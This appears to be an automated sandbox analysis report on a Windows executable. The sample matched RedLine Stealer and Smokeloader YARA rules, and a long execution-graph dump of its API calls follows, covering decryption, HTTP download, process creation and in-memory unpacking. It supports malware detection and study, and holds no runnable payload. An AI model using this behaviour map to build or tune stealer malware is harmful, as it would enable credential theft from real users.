                                  Connection: Keep-Alive
                                  Cache-Control: no-cache


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:10:37:09
                                  Start date:20/12/2024
                                  Path:C:\Users\user\Desktop\4kahanaK78.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\4kahanaK78.exe"
                                  Imagebase:0x400000
                                  File size:1'933'312 bytes
                                  MD5 hash:3C2E26D10FA55AF2E913120DF3B7EDDB
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3307293303.0000000000D89000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:6
                                  Start time:10:38:30
                                  Start date:20/12/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4128 -s 1516
                                  Imagebase:0x7b0000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:2.6%
                                    Dynamic/Decrypted Code Coverage:32.1%
                                    Signature Coverage:22.5%
                                    Total number of Nodes:688
                                    Total number of Limit Nodes:20
                                    execution_graph 34169 4034c0 CryptAcquireContextW 34170 40360a GetLastError CryptReleaseContext 34169->34170 34171 40354e CryptCreateHash 34169->34171 34172 403754 34170->34172 34171->34170 34173 403572 34171->34173 34174 40377a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34172->34174 34176 4037a2 34172->34176 34193 409035 34173->34193 34218 408ec2 34174->34218 34225 40c26f 34176->34225 34178 40379e 34179 4035aa 34207 40e46b 34179->34207 34184 4035e6 CryptDeriveKey 34184->34170 34186 403625 34184->34186 34185 4035d8 GetLastError 34185->34172 34211 40e2bd 34186->34211 34188 40362b __InternalCxxFrameHandler 34189 409035 27 API calls 34188->34189 34192 40364a __InternalCxxFrameHandler 34189->34192 34190 403748 CryptDestroyKey 34190->34172 34191 4036bc CryptDecrypt 34191->34190 34191->34192 34192->34190 34192->34191 34195 408ff7 34193->34195 34194 40e2bd ___std_exception_copy 15 API calls 34194->34195 34195->34194 34196 409016 34195->34196 34198 409018 34195->34198 34232 40ff9c RtlEnterCriticalSection RtlLeaveCriticalSection _free 34195->34232 34196->34179 34199 401600 Concurrency::cancel_current_task 34198->34199 34200 409022 34198->34200 34230 40a370 RaiseException 34199->34230 34233 40a370 RaiseException 34200->34233 34202 40161c 34231 40a131 26 API calls 2 library calls 34202->34231 34205 4097b1 34206 401643 34206->34179 34208 40e479 34207->34208 34234 40e2c8 34208->34234 34217 41249e _free 34211->34217 34212 4124dc 34272 40c339 14 API calls _free 34212->34272 34214 4124c7 RtlAllocateHeap 34215 4124da 34214->34215 34214->34217 34215->34188 34217->34212 34217->34214 34271 40ff9c RtlEnterCriticalSection RtlLeaveCriticalSection _free 34217->34271 34219 408eca 34218->34219 34220 408ecb IsProcessorFeaturePresent 34218->34220 34219->34178 34222 408f12 34220->34222 34273 408ed5 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 34222->34273 34224 408ff5 34224->34178 34274 40c1fb 25 API calls 2 library calls 34225->34274 34227 40c27e 34275 40c28c 11 API calls __CreateFrameInfo 34227->34275 34229 40c28b 34230->34202 34231->34206 34232->34195 34233->34205 34235 40e2df 34234->34235 34236 40e2f1 34235->34236 34237 40e309 34235->34237 34252 4035bc CryptHashData 34235->34252 34261 40c339 14 API calls _free 34236->34261 34263 40c369 37 API calls 2 library calls 34237->34263 34240 40e2f6 34262 40c25f 25 API calls ___std_exception_copy 34240->34262 34241 40e314 34243 40e341 34241->34243 34244 40e322 34241->34244 34246 40e413 34243->34246 34247 40e349 34243->34247 34264 413393 19 API calls 3 library calls 34244->34264 34246->34252 34269 4132ab MultiByteToWideChar 34246->34269 34247->34252 34265 4132ab MultiByteToWideChar 34247->34265 34250 40e43d 34250->34252 34270 40c339 14 API calls _free 34250->34270 34251 40e38b 34251->34252 34253 40e396 GetLastError 34251->34253 34252->34184 34252->34185 34255 40e3f6 34253->34255 34260 40e3a1 34253->34260 34255->34252 34268 40c339 14 API calls _free 34255->34268 34257 40e3e0 34267 4132ab MultiByteToWideChar 34257->34267 34260->34255 34260->34257 34266 413271 37 API calls __fassign 34260->34266 34261->34240 34262->34252 34263->34241 34264->34252 34265->34251 34266->34260 34267->34255 34268->34252 34269->34250 34270->34252 34271->34217 34272->34215 34273->34224 34274->34227 34275->34229 34276 403940 34321 40aa10 34276->34321 34279 4039e0 34279->34279 34323 402470 34279->34323 34284 4039fc 34285 403b2b CreateDirectoryA Sleep 34284->34285 34338 40f021 34284->34338 34341 4037e0 34284->34341 34347 408a60 34284->34347 34285->34284 34286 403b59 __cftof 34285->34286 34287 409035 27 API calls 34286->34287 34288 403b8d __cftof 34287->34288 34289 402470 27 API calls 34288->34289 34290 403cda 34289->34290 34291 408a60 27 API calls 34290->34291 34292 403d05 34291->34292 34293 402470 27 API calls 34292->34293 34294 403eaa 34293->34294 34295 408a60 27 API calls 34294->34295 34296 403ec9 34295->34296 34352 401d60 34296->34352 34298 403f5a __cftof 34299 409035 27 API calls 34298->34299 34300 404063 __cftof 34299->34300 34301 402470 27 API calls 34300->34301 34302 4041aa 34301->34302 34303 408a60 27 API calls 34302->34303 34304 4041d5 34303->34304 34305 402470 27 API calls 34304->34305 34306 40437a 34305->34306 34307 408a60 27 API calls 34306->34307 34308 404399 34307->34308 34309 401d60 40 API calls 34308->34309 34310 40442a 34309->34310 34311 404939 CoUninitialize 34310->34311 34312 404978 34311->34312 34313 4049ba CoUninitialize 34312->34313 34316 4049f9 34313->34316 34314 404a74 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34315 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34314->34315 34317 404a95 34315->34317 34316->34314 34318 404aba 34316->34318 34319 40c26f 25 API calls 34318->34319 34320 404abf 34319->34320 34322 40399b GetTempPathA 34321->34322 34322->34279 34324 40248e __InternalCxxFrameHandler 34323->34324 34327 4024b4 34323->34327 34324->34284 34325 40259e 34370 4016a0 27 API calls std::_Xinvalid_argument 34325->34370 34327->34325 34330 402508 34327->34330 34331 40252d 34327->34331 34328 4025a3 34371 401600 27 API calls 3 library calls 34328->34371 34330->34328 34368 401600 27 API calls 4 library calls 34330->34368 34336 402519 __InternalCxxFrameHandler 34331->34336 34369 401600 27 API calls 4 library calls 34331->34369 34332 4025a8 34335 40c26f 25 API calls 34335->34325 34336->34335 34337 402580 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34336->34337 34337->34284 34372 4111fd GetLastError 34338->34372 34417 4082a0 34341->34417 34343 403844 34344 4038a1 34343->34344 34345 40f021 37 API calls 34343->34345 34431 408740 27 API calls 3 library calls 34343->34431 34344->34284 34345->34343 34348 408ae8 34347->34348 34351 408a7a __InternalCxxFrameHandler 34347->34351 34436 408b10 27 API calls 3 library calls 34348->34436 34350 408afa 34350->34284 34351->34284 34353 401db2 34352->34353 34353->34353 34354 402470 27 API calls 34353->34354 34355 401dc5 34354->34355 34356 402470 27 API calls 34355->34356 34357 401e8d __InternalCxxFrameHandler 34356->34357 34437 40c34c 34357->34437 34360 401fc3 34362 402062 34360->34362 34363 402033 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34360->34363 34361 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34364 402057 34361->34364 34365 40c26f 25 API calls 34362->34365 34363->34361 34364->34298 34366 402067 34365->34366 34367 401d60 39 API calls 34366->34367 34368->34336 34369->34336 34371->34332 34373 41121a 34372->34373 34374 411214 34372->34374 34378 411220 SetLastError 34373->34378 34403 411db0 6 API calls _free 34373->34403 34402 411d71 6 API calls _free 34374->34402 34377 411238 34377->34378 34379 41123c 34377->34379 34385 4112b4 34378->34385 34386 40f026 34378->34386 34404 411a65 14 API calls _free 34379->34404 34381 411248 34383 411250 34381->34383 34384 411267 34381->34384 34405 411db0 6 API calls _free 34383->34405 34412 411db0 6 API calls _free 34384->34412 34415 40fad9 37 API calls __CreateFrameInfo 34385->34415 34386->34284 34391 411273 34392 411277 34391->34392 34393 411288 34391->34393 34413 411db0 6 API calls _free 34392->34413 34414 41102b 14 API calls _free 34393->34414 34397 41125e 34406 411ac2 34397->34406 34398 411293 34400 411ac2 _free 14 API calls 34398->34400 34399 411264 34399->34378 34401 41129a 34400->34401 34401->34378 34402->34373 34403->34377 34404->34381 34405->34397 34407 411af6 _free 34406->34407 34408 411acd RtlFreeHeap 34406->34408 34407->34399 34408->34407 34409 411ae2 34408->34409 34416 40c339 14 API calls _free 34409->34416 34411 411ae8 GetLastError 34411->34407 34412->34391 34413->34397 34414->34398 34416->34411 34418 4082bb 34417->34418 34430 4083a4 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34417->34430 34419 408431 34418->34419 34422 408351 34418->34422 34423 40832a 34418->34423 34429 40833b __InternalCxxFrameHandler 34418->34429 34418->34430 34434 4016a0 27 API calls std::_Xinvalid_argument 34419->34434 34421 408436 34435 401600 27 API calls 3 library calls 34421->34435 34422->34429 34433 401600 27 API calls 4 library calls 34422->34433 34423->34421 34432 401600 27 API calls 4 library calls 34423->34432 34425 40843b 34428 40c26f 25 API calls 34428->34419 34429->34428 34429->34430 34430->34343 34431->34343 34432->34429 34433->34429 34435->34425 34436->34350 34440 41144f 34437->34440 34444 411463 34440->34444 34441 411467 34442 401ed8 InternetOpenA 34441->34442 34459 40c339 14 API calls _free 34441->34459 34442->34360 34444->34441 34444->34442 34446 4114a1 34444->34446 34445 411491 34460 40c25f 25 API calls ___std_exception_copy 34445->34460 34461 40c369 37 API calls 2 library calls 34446->34461 34449 4114ad 34450 4114b7 34449->34450 34454 4114ce 34449->34454 34462 417a24 25 API calls 2 library calls 34450->34462 34452 4115a5 34452->34442 34465 40c339 14 API calls _free 34452->34465 34453 411550 34453->34442 34463 40c339 14 API calls _free 34453->34463 34454->34452 34454->34453 34457 411599 34464 40c25f 25 API calls ___std_exception_copy 34457->34464 34459->34445 34460->34442 34461->34449 34462->34442 34463->34457 34464->34442 34465->34442 34466 404ac0 34497 40f20b 34466->34497 34470 404b18 __cftof 34471 409035 27 API calls 34470->34471 34476 404b6c __cftof std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34471->34476 34474 408a60 27 API calls 34474->34476 34476->34474 34477 401d60 40 API calls 34476->34477 34478 404e50 Sleep 34476->34478 34479 402470 27 API calls 34476->34479 34480 404e60 __cftof 34476->34480 34503 409170 6 API calls 34476->34503 34504 409482 28 API calls 34476->34504 34505 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34476->34505 34477->34476 34478->34476 34479->34476 34481 409035 27 API calls 34480->34481 34484 404e95 __cftof 34481->34484 34482 402470 27 API calls 34482->34484 34483 408a60 27 API calls 34483->34484 34484->34482 34484->34483 34485 401d60 40 API calls 34484->34485 34486 40520f 34484->34486 34485->34484 34487 40530a CoUninitialize 34486->34487 34488 405320 34487->34488 34489 40533c CoUninitialize 34488->34489 34490 405375 34489->34490 34491 405423 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34490->34491 34493 40544b 34490->34493 34492 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34491->34492 34494 405444 34492->34494 34495 40c26f 25 API calls 34493->34495 34496 405450 34495->34496 34506 40f188 34497->34506 34499 404b0f 34500 40f042 34499->34500 34501 4111fd _unexpected 37 API calls 34500->34501 34502 40f04c 34501->34502 34502->34470 34503->34476 34504->34476 34505->34476 34507 40f197 34506->34507 34508 40f1ac 34506->34508 34514 40c339 14 API calls _free 34507->34514 34513 40f1a7 __alldvrm 34508->34513 34516 411df2 6 API calls _free 34508->34516 34510 40f19c 34515 40c25f 25 API calls ___std_exception_copy 34510->34515 34513->34499 34514->34510 34515->34513 34516->34513 34517 10001f20 34560 10005956 GetSystemTimeAsFileTime 34517->34560 34519 10001f48 34562 100059d5 34519->34562 34521 10001f4f CallUnexpected 34565 10001523 34521->34565 34523 10002174 34595 100010a3 34523->34595 34527 10002025 34598 10001cdd 49 API calls __EH_prolog3_GS 34527->34598 34531 1000202e 34559 10002164 34531->34559 34599 100059b4 37 API calls _unexpected 34531->34599 34533 10001bb9 25 API calls 34535 10002172 34533->34535 34534 10002040 34600 10001c33 39 API calls 34534->34600 34535->34523 34537 10002052 34601 10002493 27 API calls __InternalCxxFrameHandler 34537->34601 34539 1000205f 34602 10002230 27 API calls __InternalCxxFrameHandler 34539->34602 34541 10002079 34603 10002230 27 API calls __InternalCxxFrameHandler 34541->34603 34543 1000209f 34604 1000219f 27 API calls __InternalCxxFrameHandler 34543->34604 34545 100020a9 34605 10001bb9 34545->34605 34548 10001bb9 25 API calls 34549 100020bb 34548->34549 34550 10001bb9 25 API calls 34549->34550 34551 100020c4 34550->34551 34609 10001725 8 API calls __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 34551->34609 34553 100020df CallUnexpected 34554 10002100 CreateProcessA 34553->34554 34555 10002135 34554->34555 34556 1000213c ShellExecuteA 34554->34556 34555->34556 34557 1000215b 34555->34557 34556->34557 34558 10001bb9 25 API calls 34557->34558 34558->34559 34559->34533 34561 10005988 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 34560->34561 34561->34519 34610 10006e9c GetLastError 34562->34610 34566 1000152f __EH_prolog3_GS 34565->34566 34654 1000184b 34566->34654 34569 10001593 34658 1000190a 34569->34658 34570 100015ff 34663 1000179a 34570->34663 34571 10001541 34571->34569 34578 1000179a 27 API calls 34571->34578 34573 1000160d 34668 10005939 34573->34668 34576 10001650 InternetSetOptionA InternetConnectA 34579 10001692 HttpOpenRequestA 34576->34579 34580 100016e8 InternetCloseHandle 34576->34580 34577 100016eb 34581 10001704 34577->34581 34717 10001bdc 25 API calls 34577->34717 34578->34569 34583 100016e2 InternetCloseHandle 34579->34583 34584 100016bc 34579->34584 34580->34577 34582 10001bb9 25 API calls 34581->34582 34586 1000171b 34582->34586 34583->34580 34671 100010c7 34584->34671 34718 1000e8a5 34586->34718 34591 100016d3 34685 10001175 34591->34685 34592 100016df InternetCloseHandle 34592->34583 34596 100010ad 34595->34596 34597 100010bd CoUninitialize 34596->34597 34598->34531 34599->34534 34600->34537 34601->34539 34602->34541 34603->34543 34604->34545 34606 10001bc4 34605->34606 34607 10001bcc 34605->34607 34769 10001bdc 25 API calls 34606->34769 34607->34548 34609->34553 34611 10006eb3 34610->34611 34612 10006eb9 34610->34612 34639 10007580 6 API calls _unexpected 34611->34639 34616 10006ebf SetLastError 34612->34616 34640 100075bf 6 API calls _unexpected 34612->34640 34615 10006ed7 34615->34616 34617 10006edb 34615->34617 34623 10006f53 34616->34623 34624 100059df 34616->34624 34641 10007aa7 14 API calls 2 library calls 34617->34641 34619 10006ee7 34621 10006f06 34619->34621 34622 10006eef 34619->34622 34649 100075bf 6 API calls _unexpected 34621->34649 34642 100075bf 6 API calls _unexpected 34622->34642 34652 10006928 37 API calls CallUnexpected 34623->34652 34624->34521 34628 10006efd 34643 10007a3c 34628->34643 34630 10006f12 34631 10006f16 34630->34631 34632 10006f27 34630->34632 34650 100075bf 6 API calls _unexpected 34631->34650 34651 10006c9e 14 API calls _unexpected 34632->34651 34636 10006f32 34638 10007a3c _free 14 API calls 34636->34638 34637 10006f03 34637->34616 34638->34637 34639->34612 34640->34615 34641->34619 34642->34628 34644 10007a47 RtlFreeHeap 34643->34644 34648 10007a70 __dosmaperr 34643->34648 34645 10007a5c 34644->34645 34644->34648 34653 10005926 14 API calls __strnicoll 34645->34653 34647 10007a62 GetLastError 34647->34648 34648->34637 34649->34630 34650->34628 34651->34636 34653->34647 34655 10001868 34654->34655 34655->34655 34656 1000190a 27 API calls 34655->34656 34657 1000187c 34656->34657 34657->34571 34659 10001978 34658->34659 34662 10001920 __InternalCxxFrameHandler 34658->34662 34721 10001a59 27 API calls std::_Xinvalid_argument 34659->34721 34662->34570 34664 100017eb 34663->34664 34667 100017b3 __InternalCxxFrameHandler 34663->34667 34722 10001884 27 API calls 34664->34722 34667->34573 34723 100070ee 34668->34723 34672 100010d3 __EH_prolog3_GS 34671->34672 34673 1000184b 27 API calls 34672->34673 34674 100010e3 HttpAddRequestHeadersA 34673->34674 34749 100017f1 34674->34749 34676 10001112 HttpAddRequestHeadersA 34677 100017f1 27 API calls 34676->34677 34678 10001132 HttpAddRequestHeadersA 34677->34678 34679 100017f1 27 API calls 34678->34679 34680 10001152 HttpAddRequestHeadersA 34679->34680 34681 10001bb9 25 API calls 34680->34681 34682 1000116d 34681->34682 34683 1000e8a5 5 API calls 34682->34683 34684 10001172 HttpSendRequestA 34683->34684 34684->34591 34684->34592 34686 10001184 __EH_prolog3_GS 34685->34686 34687 100011c5 InternetSetFilePointer 34686->34687 34688 100011e3 InternetReadFile 34687->34688 34689 1000121d __InternalCxxFrameHandler 34688->34689 34689->34688 34690 10001260 CallUnexpected 34689->34690 34691 1000127d HttpQueryInfoA 34690->34691 34692 100012a6 CoCreateInstance 34691->34692 34693 1000150a 34691->34693 34692->34693 34694 100012d8 34692->34694 34695 1000e8a5 5 API calls 34693->34695 34694->34693 34697 1000184b 27 API calls 34694->34697 34696 10001520 34695->34696 34696->34592 34698 100012f7 34697->34698 34754 10001006 30 API calls 34698->34754 34700 1000130c 34701 10001bb9 25 API calls 34700->34701 34707 1000134f CallUnexpected 34701->34707 34702 1000149d 34758 10005926 14 API calls __strnicoll 34702->34758 34704 100014ae __InternalCxxFrameHandler 34704->34693 34705 10001427 __InternalCxxFrameHandler 34705->34702 34705->34704 34708 100014aa CallUnexpected 34705->34708 34706 100014a2 34760 1000584c 25 API calls __strnicoll 34706->34760 34707->34704 34707->34705 34711 10001456 34707->34711 34712 10001449 34707->34712 34708->34704 34759 10005926 14 API calls __strnicoll 34708->34759 34711->34705 34756 10005926 14 API calls __strnicoll 34711->34756 34755 10005926 14 API calls __strnicoll 34712->34755 34714 1000144e 34757 1000584c 25 API calls __strnicoll 34714->34757 34717->34581 34761 100026ff 34718->34761 34720 10001722 34720->34523 34720->34527 34726 10007102 34723->34726 34724 10007106 34741 10001629 InternetOpenA 34724->34741 34742 10005926 14 API calls __strnicoll 34724->34742 34726->34724 34728 10007140 34726->34728 34726->34741 34727 10007130 34743 1000584c 25 API calls __strnicoll 34727->34743 34744 100069d1 37 API calls 2 library calls 34728->34744 34731 1000714c 34732 10007156 34731->34732 34735 1000716d 34731->34735 34745 1000a31e 25 API calls __strnicoll 34732->34745 34734 100071ef 34734->34741 34746 10005926 14 API calls __strnicoll 34734->34746 34735->34734 34736 10007244 34735->34736 34736->34741 34748 10005926 14 API calls __strnicoll 34736->34748 34739 10007238 34747 1000584c 25 API calls __strnicoll 34739->34747 34741->34576 34741->34577 34742->34727 34743->34741 34744->34731 34745->34741 34746->34739 34747->34741 34748->34741 34750 100017ff 34749->34750 34750->34750 34752 1000180d __InternalCxxFrameHandler 34750->34752 34753 1000188f 27 API calls __InternalCxxFrameHandler 34750->34753 34752->34676 34753->34752 34754->34700 34755->34714 34756->34714 34757->34705 34758->34706 34759->34706 34760->34704 34762 10002707 34761->34762 34763 10002708 IsProcessorFeaturePresent 34761->34763 34762->34720 34765 10002b1c 34763->34765 34768 10002adf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 34765->34768 34767 10002bff 34767->34720 34768->34767 34769->34607 34770 401880 34771 4018e9 InternetSetFilePointer InternetReadFile 34770->34771 34772 40197d __cftof 34771->34772 34773 4019a2 HttpQueryInfoA 34772->34773 34774 401d25 34773->34774 34775 4019c6 CoCreateInstance 34773->34775 34776 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34774->34776 34775->34774 34778 4019ff 34775->34778 34777 401d50 34776->34777 34778->34774 34778->34778 34779 402470 27 API calls 34778->34779 34780 401a5c MultiByteToWideChar 34779->34780 34781 409035 27 API calls 34780->34781 34782 401aae MultiByteToWideChar 34781->34782 34783 401b10 34782->34783 34783->34783 34798 402310 27 API calls 3 library calls 34783->34798 34785 401c00 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34789 409035 27 API calls 34785->34789 34791 401cf1 34785->34791 34786 401b2c 34786->34785 34787 401d56 34786->34787 34788 40c26f 25 API calls 34787->34788 34790 401d5b 34788->34790 34792 401c37 34789->34792 34791->34774 34792->34791 34793 409035 27 API calls 34792->34793 34797 401cc4 34792->34797 34794 401cb4 34793->34794 34799 4014b0 25 API calls 4 library calls 34794->34799 34800 4014b0 25 API calls 4 library calls 34797->34800 34798->34786 34799->34797 34800->34791 34801 a9faac VirtualProtect 34802 a9facb 34801->34802 34803 4b4003c 34804 4b40049 34803->34804 34818 4b40e0f SetErrorMode SetErrorMode 34804->34818 34809 4b40265 34810 4b402ce VirtualProtect 34809->34810 34812 4b4030b 34810->34812 34811 4b40439 VirtualFree 34816 4b405f4 LoadLibraryA 34811->34816 34817 4b404be 34811->34817 34812->34811 34813 4b404e3 LoadLibraryA 34813->34817 34815 4b408c7 34816->34815 34817->34813 34817->34816 34819 4b40223 34818->34819 34820 4b40d90 34819->34820 34821 4b40dad 34820->34821 34822 4b40dbb GetPEB 34821->34822 34823 4b40238 VirtualAlloc 34821->34823 34822->34823 34823->34809 34824 40e268 34825 411ac2 _free 14 API calls 34824->34825 34826 40e280 34825->34826 34827 100079ee 34828 10007a2c 34827->34828 34832 100079fc _unexpected 34827->34832 34835 10005926 14 API calls __strnicoll 34828->34835 34830 10007a17 RtlAllocateHeap 34831 10007a2a 34830->34831 34830->34832 34832->34828 34832->34830 34834 10005aed EnterCriticalSection LeaveCriticalSection _unexpected 34832->34834 34834->34832 34835->34831 34836 4037d0 34844 40f00b 34836->34844 34839 4082a0 27 API calls 34842 403844 34839->34842 34840 4038a1 34841 40f021 37 API calls 34841->34842 34842->34840 34842->34841 34847 408740 27 API calls 3 library calls 34842->34847 34848 40eea9 34844->34848 34847->34842 34849 40eeb7 34848->34849 34850 40eec9 34848->34850 34876 409906 GetModuleHandleW 34849->34876 34860 40ed50 34850->34860 34854 40eebc 34854->34850 34877 40ef4f GetModuleHandleExW 34854->34877 34855 4037d7 34855->34839 34859 40ef0c 34861 40ed5c ___scrt_is_nonwritable_in_current_image 34860->34861 34883 40f28c RtlEnterCriticalSection 34861->34883 34863 40ed66 34884 40edbc 34863->34884 34865 40ed73 34888 40ed91 34865->34888 34868 40ef0d 34893 41366f GetPEB 34868->34893 34871 40ef3c 34874 40ef4f __CreateFrameInfo 3 API calls 34871->34874 34872 40ef1c GetPEB 34872->34871 34873 40ef2c GetCurrentProcess TerminateProcess 34872->34873 34873->34871 34875 40ef44 ExitProcess 34874->34875 34876->34854 34878 40ef91 34877->34878 34879 40ef6e GetProcAddress 34877->34879 34880 40eec8 34878->34880 34881 40ef97 FreeLibrary 34878->34881 34882 40ef83 34879->34882 34880->34850 34881->34880 34882->34878 34883->34863 34885 40edc8 ___scrt_is_nonwritable_in_current_image 34884->34885 34886 40ee29 __CreateFrameInfo 34885->34886 34891 410940 14 API calls __CreateFrameInfo 34885->34891 34886->34865 34892 40f2d4 RtlLeaveCriticalSection 34888->34892 34890 40ed7f 34890->34855 34890->34868 34891->34886 34892->34890 34894 413689 34893->34894 34896 40ef17 34893->34896 34897 411c94 5 API calls _free 34894->34897 34896->34871 34896->34872 34897->34896 34898 402c70 34899 402c94 SetLastError 34898->34899 34900 402cbc 34898->34900 34976 402920 71 API calls 34899->34976 34902 402cc6 34900->34902 34903 402d01 SetLastError 34900->34903 34912 402d29 34900->34912 34977 402920 71 API calls 34902->34977 34978 402920 71 API calls 34903->34978 34904 402ca6 34906 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34904->34906 34909 402cb8 34906->34909 34908 402d13 34911 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34908->34911 34910 402cd0 SetLastError 34913 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34910->34913 34915 402d25 34911->34915 34912->34902 34916 402d94 GetNativeSystemInfo 34912->34916 34914 402ced 34913->34914 34916->34902 34917 402dc3 VirtualAlloc 34916->34917 34918 402e03 GetProcessHeap HeapAlloc 34917->34918 34919 402ddd VirtualAlloc 34917->34919 34921 402e20 VirtualFree 34918->34921 34922 402e34 34918->34922 34919->34918 34920 402def 34919->34920 34979 402920 71 API calls 34920->34979 34921->34922 34924 402e7c SetLastError 34922->34924 34925 402e9e VirtualAlloc 34922->34925 34927 402e84 34924->34927 34933 402eb7 __InternalCxxFrameHandler __cftof 34925->34933 34926 402df9 34926->34918 34980 4033d0 16 API calls ___vcrt_freefls@4 34927->34980 34929 402e8b 34930 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34929->34930 34931 402e9a 34930->34931 34933->34924 34933->34927 34934 402f9c 34933->34934 34952 402bf0 VirtualAlloc 34933->34952 34953 402a80 34934->34953 34935 403165 34936 402950 77 API calls 34935->34936 34937 403176 34936->34937 34937->34927 34942 40317e 34937->34942 34938 40303c 34938->34927 34938->34935 34961 402950 34938->34961 34940 40320a 34943 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34940->34943 34941 4031ba 34944 4031f4 34941->34944 34945 4031c5 34941->34945 34942->34940 34942->34941 34947 403220 34943->34947 34946 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34944->34946 34949 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34945->34949 34948 403206 34946->34948 34950 4031f0 34949->34950 34952->34933 34954 402bdc 34953->34954 34958 402aa0 34953->34958 34954->34938 34955 402bcb SetLastError 34955->34938 34956 402bae SetLastError 34956->34938 34958->34954 34958->34955 34958->34956 34959 402b8f SetLastError 34958->34959 34959->34938 34962 402969 34961->34962 34970 4029a5 34961->34970 34964 402974 34962->34964 34965 4029be VirtualProtect 34962->34965 34963 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34966 4029ba 34963->34966 34964->34970 34981 402c10 VirtualFree 34964->34981 34967 402a02 GetLastError FormatMessageA 34965->34967 34965->34970 34966->34938 34968 402a27 34967->34968 34968->34968 34969 402a2e LocalAlloc 34968->34969 34982 4028e0 69 API calls 34969->34982 34970->34963 34972 402a51 OutputDebugStringA LocalFree LocalFree 34973 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34972->34973 34974 402a77 34973->34974 34974->34938 34976->34904 34977->34910 34978->34908 34979->34926 34980->34929 34981->34970 34982->34972 34983 4016b0 34984 4016c3 __cftof 34983->34984 34985 409035 27 API calls 34984->34985 34986 4016da __cftof 34985->34986 34987 10005bf4 34988 10007a3c _free 14 API calls 34987->34988 34989 10005c0c 34988->34989 34990 40955c 34991 409568 ___scrt_is_nonwritable_in_current_image 34990->34991 35018 4092bc 34991->35018 34993 40956f 34994 4096c2 34993->34994 35002 409599 ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 34993->35002 35046 4097b2 4 API calls 2 library calls 34994->35046 34996 4096c9 34997 40f00b 23 API calls 34996->34997 34998 4096cf 34997->34998 35047 40efcf 23 API calls __CreateFrameInfo 34998->35047 35000 4096d7 35001 4095b8 35002->35001 35003 409639 35002->35003 35042 40efe5 37 API calls 4 library calls 35002->35042 35026 4098cd 35003->35026 35019 4092c5 35018->35019 35048 4099b3 IsProcessorFeaturePresent 35019->35048 35021 4092d1 35049 40ab6a 10 API calls 2 library calls 35021->35049 35023 4092d6 35024 4092da 35023->35024 35050 40ab89 7 API calls 2 library calls 35023->35050 35024->34993 35027 40aa10 __cftof 35026->35027 35028 4098e0 GetStartupInfoW 35027->35028 35029 40963f 35028->35029 35030 410b89 35029->35030 35051 4167a2 35030->35051 35032 409647 35035 408020 35032->35035 35034 410b92 35034->35032 35057 416a47 37 API calls 35034->35057 35036 402470 27 API calls 35035->35036 35037 408055 35036->35037 35038 402470 27 API calls 35037->35038 35039 40807a 35038->35039 35060 4055c0 35039->35060 35042->35003 35046->34996 35047->35000 35048->35021 35049->35023 35050->35024 35052 4167dd 35051->35052 35053 4167ab 35051->35053 35052->35034 35058 4112ba 37 API calls 2 library calls 35053->35058 35055 4167ce 35059 4165e9 47 API calls 2 library calls 35055->35059 35057->35034 35058->35055 35059->35052 35061 40f20b 26 API calls 35060->35061 35062 40560f 35061->35062 35063 40f042 37 API calls 35062->35063 35064 405618 Sleep 35063->35064 35065 402470 27 API calls 35064->35065 35066 40564e 35065->35066 35068 4038c0 27 API calls __InternalCxxFrameHandler 35066->35068 35069 d89026 35070 d89035 